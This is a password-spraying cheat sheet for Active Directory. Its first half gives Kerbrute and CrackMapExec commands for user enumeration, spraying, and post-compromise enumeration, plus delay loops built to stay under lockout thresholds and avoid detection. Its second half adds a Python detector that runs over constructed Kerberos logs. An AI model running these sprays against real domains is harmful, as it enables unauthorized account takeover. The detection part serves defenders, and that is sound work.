5. Password Spraying Overview

1. User Enumeration with Kerbrute

# Using a predefined username list
kerbrute userenum --dc <domain-controller> -d <domain> usernames.txt

# Using a generated username list (GUIDs example)
for x in {{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}}; do echo $x; done > usernames.txt
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm=frizz.htb 10.10.11.60

2. Password Spraying with Kerbrute

kerbrute passwordspray --dc <domain-controller> -d <domain> -U usernames.txt -p <common-password>

3. Password Spraying with CrackMapExec (CME)

cme smb <target-ip> -u usernames.txt -p <password> --no-bruteforce

4. Obtaining Password Policy (if internal access is available)

net accounts                          # cmd.exe: shows lockout threshold, observation window and lockout duration
Get-ADDefaultDomainPasswordPolicy     # PowerShell, requires the ActiveDirectory module (RSAT)

5. Delay Consideration Between Sprays (Bash Example)

for password in Welcome1 Passw0rd Winter2022; do
    cme smb <target-ip> -u usernames.txt -p "$password" --no-bruteforce
    sleep 1800  # Wait 30 minutes between passwords so attempts stay outside the lockout observation window
done

6. Handling Large User Lists (Bash Example)

split -l 1000 usernames.txt user_chunk_   # 1000 users per chunk, files named user_chunk_aa, user_chunk_ab, ...
for file in user_chunk_*; do
    kerbrute passwordspray --dc <domain-controller> -d <domain> -U "$file" -p <password>
    sleep 1800
done

7. Post-Spray Enumeration

cme smb <target-ip> -u <username> -p <password> --shares
cme smb <target-ip> -u <username> -p <password> --sessions

8. Automation (Basic Script)

#!/bin/bash
PASSWORDS=(Welcome1 Passw0rd Winter2022)
for password in "${PASSWORDS[@]}"; do
    kerbrute passwordspray --dc <domain-controller> -d <domain> -U usernames.txt -p "$password"
    sleep 1800  # Same delay logic as above: one password per observation window
done

Notes:

- Adjust delay times based on password policy.

- Always confirm the password policy before attempting spraying.

- Use minimal attempts to avoid detection and lockouts.
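The notes above say to keep attempts minimal "to avoid detection and lockouts". Per-account lockout counters never fire on a spray, because each account sees one or two failures; what does give it away is the aggregate: one source failing against many distinct accounts. The following is an added example of that detection logic, not part of the original cheat sheet. It runs over constructed log lines in a simplified `key=value` form (the field names are assumptions, not a real Windows event schema; the event IDs 4771 for Kerberos pre-authentication failure and 4768 for a TGT request are the real ones) and also shows why the detection window must be longer than the sprayer's delay: the 30-minute sleep above is invisible to a 30-minute window but not to a one-hour window.

```python
"""Detection of a password-spray pattern over constructed Kerberos audit lines.

Added example, not part of the original page. Log format and field names are
assumptions chosen for readability; only the event IDs are real.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log. 10.0.0.50 sprays five accounts with two passwords
# 30 minutes apart (the loop from the cheat sheet) and gets erin's password;
# 10.0.0.7 is a legitimate user mistyping a password; 10.0.0.99 is a
# low-and-slow spray, one account every 15 minutes.
SAMPLE_LOG = """\
2024-03-01T09:00:01 event=4771 src=10.0.0.50 user=alice result=FAIL
2024-03-01T09:00:02 event=4771 src=10.0.0.50 user=bob result=FAIL
2024-03-01T09:00:03 event=4771 src=10.0.0.50 user=carol result=FAIL
2024-03-01T09:00:04 event=4771 src=10.0.0.50 user=dave result=FAIL
2024-03-01T09:00:05 event=4771 src=10.0.0.50 user=erin result=FAIL
2024-03-01T09:10:00 event=4771 src=10.0.0.7 user=frank result=FAIL
2024-03-01T09:10:05 event=4771 src=10.0.0.7 user=frank result=FAIL
2024-03-01T09:10:09 event=4768 src=10.0.0.7 user=frank result=OK
2024-03-01T09:30:01 event=4771 src=10.0.0.50 user=alice result=FAIL
2024-03-01T09:30:02 event=4771 src=10.0.0.50 user=bob result=FAIL
2024-03-01T09:30:03 event=4771 src=10.0.0.50 user=carol result=FAIL
2024-03-01T09:30:04 event=4771 src=10.0.0.50 user=dave result=FAIL
2024-03-01T09:30:05 event=4768 src=10.0.0.50 user=erin result=OK
2024-03-01T10:00:00 event=4771 src=10.0.0.99 user=gwen result=FAIL
2024-03-01T10:15:00 event=4771 src=10.0.0.99 user=hank result=FAIL
2024-03-01T10:30:00 event=4771 src=10.0.0.99 user=ivan result=FAIL
2024-03-01T10:45:00 event=4771 src=10.0.0.99 user=judy result=FAIL
2024-03-01T11:00:00 event=4771 src=10.0.0.99 user=kate result=FAIL
"""


def parse_events(text):
    """Turn the constructed 'timestamp key=value ...' lines into dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts_str, *pairs = line.split()
        fields = dict(p.split("=", 1) for p in pairs)
        fields["ts"] = datetime.fromisoformat(ts_str)
        events.append(fields)
    return events


def detect_spray(events, window=timedelta(hours=1), min_accounts=5, max_per_account=2):
    """Return {src: sorted(accounts)} for each source that, inside some
    sliding `window`, failed against at least `min_accounts` distinct accounts
    with no more than `max_per_account` failures each (the spray signature:
    wide across accounts, shallow per account, below any lockout threshold)."""
    failures = defaultdict(list)  # src -> [(ts, user), ...]
    for e in events:
        if e.get("result") == "FAIL":
            failures[e["src"]].append((e["ts"], e["user"]))
    hits = {}
    for src, items in failures.items():
        items.sort()
        for i, (start, _) in enumerate(items):
            counts = defaultdict(int)
            for ts, user in items[i:]:
                if ts - start > window:
                    break
                counts[user] += 1
            if len(counts) >= min_accounts and max(counts.values()) <= max_per_account:
                hits[src] = sorted(counts)
                break
    return hits


def suspected_compromise(events, hits):
    """Accounts that later authenticated successfully from a flagged source:
    the ones to reset and investigate first once a spray is confirmed."""
    out = defaultdict(set)
    for e in events:
        if e["src"] in hits and e.get("result") == "OK":
            out[e["src"]].add(e["user"])
    return {src: sorted(users) for src, users in out.items()}


if __name__ == "__main__":
    evts = parse_events(SAMPLE_LOG)
    for w in (timedelta(minutes=30), timedelta(hours=1)):
        found = detect_spray(evts, window=w)
        print(f"window={w}: flagged sources {sorted(found)}")
    print("successful logons from flagged sources:",
          suspected_compromise(evts, detect_spray(evts)))
```

The threshold values are tuning knobs: `min_accounts` should sit well below the size of a typical spray list but above what a shared jump host produces legitimately, and `window` should exceed the largest delay an attacker can plausibly afford between passwords, since a window shorter than the sprayer's sleep sees each batch in isolation.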
